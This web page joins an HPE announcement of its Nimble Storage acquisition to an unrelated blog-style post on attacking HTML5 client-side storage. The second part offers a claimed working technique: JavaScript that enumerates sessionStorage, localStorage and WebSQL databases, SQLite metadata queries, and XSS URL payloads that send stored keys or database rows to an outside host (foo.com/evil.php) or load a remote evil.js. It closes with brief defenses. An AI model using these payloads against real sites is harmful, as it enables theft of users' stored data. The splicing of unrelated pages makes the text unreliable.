HPE completes Nimble Storage acquisition

HPE completes Nimble Storage acquisition

HPE has completed the acquisition of Nimble Storage, now a Hewlett Packard Enterprise company. This acquisition builds on our strategy to make Hybrid IT simple, through software defined infrastructure with a modern flash-optimized storage foundation. A report by IDC called the acquisition a “bold, strategic move” that will benefit our customers—and HPE couldn’t agree more.
The Nimble Storage offerings for predictive all-flash for entry to midrange segments are complementary to our scalable midrange to high-end HPE 3PAR solutions and affordable HPE MSA products. In addition, HPE will incorporate the InfoSight Predictive Analytics platform by Nimble Storage across our existing storage portfolio, which will enable continuity of products and deliver a transformed customer support experience.
With this acquisition, HPE will offer a full range of best-in-class all-flash storage solutions that will enable customers to compose the right storage for their exact application needs. Our comprehensive, flash-optimized storage portfolio across all workloads and resource requirements will provide:
  • Enterprise class for the all-flash datacenter: HPE 3PAR supports customers experiencing rapid growth and needing a highly scalable, all-flash data center capable of supporting up to millions of IOPS, petabyte capacity, and a multi-tenant architecture—priced from midrange to high-end.
  • Straightforward predictive flash: Nimble Storage is ideal for midmarket customers needing advanced, flash-optimized data services, including all-flash, hybrid-flash, and multicloud support, underpinned by machine-learning based predictive analytics, all at entry to midrange price points and designed with ease-of-use at its core.
  • Simple flash acceleration: HPE MSA and HPE StoreVirtual have an installed base of over 500,000 deployments worldwide and are suited for price-sensitive small site customers that need simple, flash tiering support at an entry price point.
  • Built-for-enterprise hyperconverged infrastructure: Nimble Storage also complements our recent SimpliVity acquisition for the growing hyperconverged market for those deploying turnkey VM-farms. The combination of SimpliVity, Nimble Storage, and HPE 3PAR enables customers to deploy the right data services across all workloads, scale and deployment types.

Client-side Storage using HTML5, really secure or just an abuse ?

HTML5 has introduced some new ways to save huge amount of data on the PC through the browser (use chromium or chrome to see how this work) Hakcers could steal or modify sensitive data online or offline. If a web application which uses this kind of storage ( client-side ) is vulnerable to XSS attacks we can use an attack payload to read or modify the content of known storage keys on the computer’s victim. If the web application loads data or code from the local storage, could be also quite powerful to inject malicious code that will be executed every time the web application will request it.

Working technique : ( 100% working technique, i got success while doing this, you just have to use your brain )

Storage Object Enumeration

var ss = “”;
for(i in window.sessionStorage)
{
ss += i + ” “;
}
var ls = “”;
for(i = 0; i < localStorage.length; i++)
 {
ls += localStorage.key(i) + ” “;
 }

Database Object Enumeration

var db = “”;
for(i in window)
{
if(window[i] == “[object Database]”)
{
db += i + “ “;
}
}

Extracting Database Metadata

SELECT name FROM sqlite_master WHERE type=’table’
SELECT sql FROM sqlite_master WHERE name=’table_name’
SELECT sqlite_version()

One Shot Attack :

http://blah_blah.com/page.php?name=<script>document.write(‘<img
src=”http://foo.com/ evil.php?name=’ %2B globalStorage[location.hostname].mykey %2B ‘”>’);</script>

http://blah_blah.com/page.php?name=<script>db.transaction(function (tx) { tx.executeSql (“SELECT * FROM client_tb”, [], function(tx, result){ document.write(‘<img src=”http:// foo.com/evil.php?name=’ %2B result.rows.item(0)[‘col_data’] %2B ‘”>’); }); });</script>

http://example.com/page.php?name=<script src=http://foo.com/evil.js>
</script>


Defenses
Website: Avoid saving sensitive data on the users machine and clear
the client-side storage whenever possible.

Web Browser: Web users should check regularly the content of the
HTML5 client-side storage saved by their browser (delete?).

LSO Storage Locations: ( i know only for linux, not a windows user unfortunately :p )

Linux :

/home/$user/.macromedia/Flash_Player/#SharedObjects

Pin It on Pinterest